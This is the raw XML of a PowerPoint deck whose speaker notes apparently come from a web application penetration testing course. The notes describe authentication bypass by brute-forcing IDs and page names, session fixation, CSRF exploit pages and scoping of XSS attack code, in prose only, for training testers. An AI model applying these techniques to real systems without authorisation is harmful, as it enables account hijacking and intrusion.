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937" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId135"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId136"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="274" r:id="rId2"/>
    <p:sldId id="275" r:id="rId3"/>
    <p:sldId id="276" r:id="rId4"/>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="278" r:id="rId6"/>
    <p:sldId id="279" r:id="rId7"/>
    <p:sldId id="280" r:id="rId8"/>
    <p:sldId id="281" r:id="rId9"/>
    <p:sldId id="282" r:id="rId10"/>
    <p:sldId id="283" r:id="rId11"/>
    <p:sldId id="284" r:id="rId12"/>
    <p:sldId id="290" r:id="rId13"/>
    <p:sldId id="291" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="295" r:id="rId17"/>
    <p:sldId id="296" r:id="rId18"/>
    <p:sldId id="297" r:id="rId19"/>
    <p:sldId id="298" r:id="rId20"/>
    <p:sldId id="299" r:id="rId21"/>
    <p:sldId id="300" r:id="rId22"/>
    <p:sldId id="301" r:id="rId23"/>
    <p:sldId id="302" r:id="rId24"/>
    <p:sldId id="460" r:id="rId25"/>
    <p:sldId id="303" r:id="rId26"/>
    <p:sldId id="304" r:id="rId27"/>
    <p:sldId id="305" r:id="rId28"/>
    <p:sldId id="306" r:id="rId29"/>
    <p:sldId id="307" r:id="rId30"/>
    <p:sldId id="308" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="310" r:id="rId33"/>
    <p:sldId id="311" r:id="rId34"/>
    <p:sldId id="312" r:id="rId35"/>
    <p:sldId id="313" r:id="rId36"/>
    <p:sldId id="320" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="322" r:id="rId39"/>
    <p:sldId id="323" r:id="rId40"/>
    <p:sldId id="324" r:id="rId41"/>
    <p:sldId id="325" r:id="rId42"/>
    <p:sldId id="326" r:id="rId43"/>
    <p:sldId id="327" r:id="rId44"/>
    <p:sldId id="328" r:id="rId45"/>
    <p:sldId id="329" r:id="rId46"/>
    <p:sldId id="330" r:id="rId47"/>
    <p:sldId id="461" r:id="rId48"/>
    <p:sldId id="335" r:id="rId49"/>
    <p:sldId id="336" r:id="rId50"/>
    <p:sldId id="337"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63" r:id="rId64"/>
    <p:sldId id="364" r:id="rId65"/>
    <p:sldId id="365" r:id="rId66"/>
    <p:sldId id="366" r:id="rId67"/>
    <p:sldId id="367" r:id="rId68"/>
    <p:sldId id="368" r:id="rId69"/>
    <p:sldId id="369" r:id="rId70"/>
    <p:sldId id="370" r:id="rId71"/>
    <p:sldId id="371" r:id="rId72"/>
    <p:sldId id="372" r:id="rId73"/>
    <p:sldId id="373" r:id="rId74"/>
    <p:sldId id="374" r:id="rId75"/>
    <p:sldId id="380" r:id="rId76"/>
    <p:sldId id="381" r:id="rId77"/>
    <p:sldId id="382" r:id="rId78"/>
    <p:sldId id="383"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13" r:id="rId96"/>
    <p:sldId id="414" r:id="rId97"/>
    <p:sldId id="415" r:id="rId98"/>
    <p:sldId id="416" r:id="rId99"/>
    <p:sldId id="417" r:id="rId100"/>
    <p:sldId id="418" r:id="rId101"/>
    <p:sldId id="419" r:id="rId102"/>
    <p:sldId id="420" r:id="rId103"/>
    <p:sldId id="421" r:id="rId104"/>
    <p:sldId id="422" r:id="rId105"/>
    <p:sldId id="423" r:id="rId106"/>
    <p:sldId id="424" r:id="rId107"/>
    <p:sldId id="425" r:id="rId108"/>
    <p:sldId id="472" r:id="rId109"/>
    <p:sldId id="435" r:id="rId110"/>
    <p:sldId id="436" r:id="rId111"/>
    <p:sldId id="437" r:id="rId112"/>
    <p:sldId id="438" r:id="rId113"/>
    <p:sldId id="439" r:id="rId114"/>
    <p:sldId id="440" r:id="rId115"/>
    <p:sldId id="441" r:id="rId116"/>
    <p:sldId id="442" r:id="rId117"/>
    <p:sldId id="443" r:id="rId118"/>
    <p:sldId id="444" r:id="rId119"/>
    <p:sldId id="445" r:id="rId120"/>
    <p:sldId id="446" r:id="rId121"/>
    <p:sldId id="447" r:id="rId122"/>
    <p:sldId id="448" r:id="rId123"/>
    <p:sldId id="449" r:id="rId124"/>
    <p:sldId id="450" r:id="rId125"/>
    <p:sldId id="451" r:id="rId126"/>
    <p:sldId id="452" r:id="rId127"/>
    <p:sldId id="453" r:id="rId128"/>
    <p:sldId id="454" r:id="rId129"/>
    <p:sldId id="455" r:id="rId130"/>
    <p:sldId id="456" r:id="rId131"/>
    <p:sldId id="457" r:id="rId132"/>
    <p:sldId id="458" r:id="rId133"/>
    <p:sldId id="459" r:id="rId134"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7315200" cy="9601200"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId137"/>
      <p:bold r:id="rId138"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId139"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId139"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId140"/>
      <p:bold r:id="rId141"/>
      <p:italic r:id="rId142"/>
      <p:boldItalic r:id="rId143"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="4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4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4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4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4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4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99FFCC"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="000066"/>
    <a:srgbClr val="FF33CC"/>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1" autoAdjust="0"/>
    <p:restoredTop sz="67632" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="107" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="2117" y="-62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872" y="202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font" Target="fonts/font2.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font" Target="fonts/font3.fntdata"/><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font" Target="fonts/font4.fntdata"/><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143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId14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5.fntdata"/><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6.fntdata"/></Relationships>
</file>

<file path=ppt/_rels/viewProps.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1"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225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dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35225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dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352260"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dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35226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a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7B84F0AD-B8EC-4E4C-96AB-90A3127EB247}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3613058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560888"/>
            <a:ext cx="5943600" cy="4354512"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="8991600"/>
            <a:ext cx="3170238" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217056432"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>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8D59CF9-E72A-2C45-B0F8-F97EBC4C8C3B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited web sites altered by attackers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In the next few days, you'll learn the art of exploiting web applications so you can find flaws in your enterprise's web apps before the bad guys do. Through detailed, hands-on exercises and these materials, you will be taught the four-step process for web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other web app vulnerabilities in-depth, with tried-and-true techniques for finding them using a structured testing regimen. As well as the vulnerabilities, you will learn the tools and methods of the attacker, so that you can be a powerful defender.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DA70713-29F2-AA42-9897-D39DE09B4937}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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There are two ways which authentication can be bypassed. One method is to manually access portions of the site by reviewing the site map and going to those pages directly instead of following the menu flow. The other way is to run scripts to which brute-force directory and file listings in an attempt to find valid filenames. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manually walking through the application is a simple way to abuse this.  Use the application map from the previous steps.  In gathering that data, you should have found keys and ids used to reference pages.  These are the focus of this attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Of course scripting is the best way to abuse this flaw.  Simply write a script to brute force the ids and keys found.  You can also brute force guess page names to find pages that allow direct access when they shouldn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34304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fourth option is to load the script from server code.  This means that the server code, PHP, ASP or whatever, actually generates the client side code to deliver.  The server code determines if the victim is within scope.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34304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E9383785-A655-A04F-AB4C-2702DB5A4A75}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34406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final option to discuss actually uses the infrastructure of the pen-tester to determine scope.  Either our firewall or web server can determine if the request for the attack code is processed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34406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3E226C3-CB91-B141-9B2A-89CAAE02E43D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34509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Next we will discuss session flaws.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34509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061D35AB-51C5-D64C-BE64-1050E44C231B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34611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Session state is a critical point within most applications.  If we determine that flaws exist here, we are able to perform hijacking of a session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34611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C23B674-1BEE-9044-8CBF-A03317CAEA16}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34713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Session fixation is a common attack vector against session state.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34714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A476174-062E-0040-B161-36D5837053B9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34816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Session fixation allows us to control what session ID a user is assigned instead of attempting to predict it.  The flaw is caused because the application assigns a session ID before authentication.  Then when the user authenticates, the application continues to make use of the same session token.  The attacker is then able to receive a session ID from an application and send it to the victim.  When the victim clicks the link and authenticates, the attacker is able to then access the site using the same ID.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34816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04FDB77-CD10-1949-9782-0D41F8EAB722}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34918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a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The next flaw we will discuss exploiting is Cross-Site Request Forgery.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34918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7103112-2116-FB43-8B94-15335079957D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35021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XSRF exploitation has always been a very manual process.  Once the tester finds a flaw in the web application, they must build a web page that contains a link to the vulnerable transaction.  This typically takes the form of an &lt;img&gt; or &lt;iframe&gt; tag but can use any HTML or script that will fire the link without user interaction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The attacker then needs to get the victim to browse to the exploit page while they have an active session.  During some tests this is done by tricking a client into browsing to the page, in others the tester will work with their point of contact to validate the page or will exercise the exploit themselves.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>After the victim browses to the page, the tester then needs to go verify that the attack ran.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>While the creation of this page sounds simple, keep in mind that the tester typically has to test multiple vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35021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F16EF3F-D011-5744-9770-F4322D5B2B73}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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this exercise we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MonkeyFist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> to exploit a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> flaw.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36045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4F004B6-3E6F-2543-8676-529FFEC7CE77}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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next section is where we are going to take what we have learned over the last five days and put it together.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36045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4F004B6-3E6F-2543-8676-529FFEC7CE77}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20582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cover the bypass attacks and how to use them within your test.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
